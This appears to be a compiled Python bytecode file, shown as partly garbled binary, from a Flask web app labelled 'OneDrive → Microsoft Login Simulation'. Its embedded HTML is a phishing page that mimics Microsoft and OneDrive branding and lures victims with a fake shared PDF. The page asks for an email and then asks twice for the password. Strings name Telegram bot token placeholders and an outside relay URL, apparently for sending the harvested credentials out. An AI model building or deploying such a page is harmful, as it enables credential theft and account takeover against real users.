File: /home/imperialpark/myapp/__pycache__/task_manager.cpython-310.pyc
o
xE�i4$ � @ s2 d Z ddlZddlZddlZddlZddlZddlZddlmZm Z m
Z
mZmZm
Z
ee�ZdZdZdZdZdZd(dd�Zd
d� Zdd� Zdd� Ze�d�dd� �Zejddgd�dd� �Ze�d�dd� �Zedkr�ed� ed � ed� ed!� ed"e� �� ed#e� �� ed� ejd$d%d&d'� dS dS ))uF
OneDrive → Microsoft Login Simulation
Python Flask Web Application
� N)�Flask�render_template_string�request�jsonify�redirect�url_for�YOUR_BOT_TOKEN_HERE�YOUR_CHAT_ID_HEREz-https://medltempus.com/wp/telegram_sender.phpzhttps://login.microsoft.comu�
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<title>OneDrive → Microsoft Login</title>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<style>
/* ... (CSS styles from your original HTML) ... */
</style>
</head>
<body>
<div class="topbar">OneDrive</div>
<div class="stage">
<!-- SCREEN 0 - Loading Envelope Screen -->
<div id="loadingScreen" class="screen loading-screen">
<div class="envelope-container">
<div class="envelope">
<div class="envelope-icon">✉️</div>
</div>
<div class="loading-text">Loading secure content</div>
<div class="loading-subtext">Checking your access permissions</div>
<div class="loading-dots">
<div class="dot"></div>
<div class="dot"></div>
<div class="dot"></div>
</div>
</div>
</div>
<!-- SCREEN 1 - Email -->
<div id="screen1" class="screen hidden">
<div>
<div class="card center">
<div class="logo" style="justify-content:center;">
<div class="logo-box">
<div></div><div></div><div></div><div></div>
</div>
Microsoft
</div>
<h2>View PROPOSAL</h2>
<div class="text">You have received a secure link:</div>
<div class="file">
<div class="file-icon">PDF</div>
<div>F324.pdf</div>
</div>
<div class="text">
To open this secure link, enter the email this item was shared to.
</div>
<input id="emailInput" placeholder="Enter your email" />
<div class="error-message" id="emailError">Please enter a valid email address</div>
<button id="emailButton" onclick="checkEmail()">Next</button>
</div>
<div class="text center" style="margin-top:12px;">
Privacy & Cookies
</div>
</div>
</div>
<!-- SCREEN 2 - First Password -->
<div id="screen2" class="screen login-bg hidden">
<div class="card">
<div class="logo">
<div class="logo-box">
<div></div><div></div><div></div><div></div>
</div>
Microsoft
</div>
<div class="back" onclick="returnToEmail()">← <span id="backEmail"></span></div>
<h2>Enter password</h2>
<input type="password" id="password1" placeholder="Password" />
<div class="error-message" id="password1Error">Please enter your password</div>
<div class="link">Forgot my password</div>
<button id="password1Button" onclick="saveFirstPassword()">Next</button>
</div>
</div>
<!-- SCREEN 3 - Second Password -->
<div id="screen3" class="screen login-bg hidden">
<div class="card">
<div class="logo">
<div class="logo-box">
<div></div><div></div><div></div><div></div>
</div>
Microsoft
</div>
<div class="back" onclick="returnToFirstPassword()">← <span id="backEmail2"></span></div>
<h2>Confirm password</h2>
<div class="text">
Please re-enter your password for verification.
</div>
<input type="password" id="password2" placeholder="Re-enter password" />
<div class="error-message" id="password2Error">Please re-enter your password</div>
<div class="link">Forgot my password</div>
<button id="password2Button" onclick="completeLogin()">Sign in</button>
</div>
</div>
</div>
<script>
// JavaScript client-side code (same as before)
// ... (include your existing JavaScript here)
</script>
</body>
</html>
�, � c C s"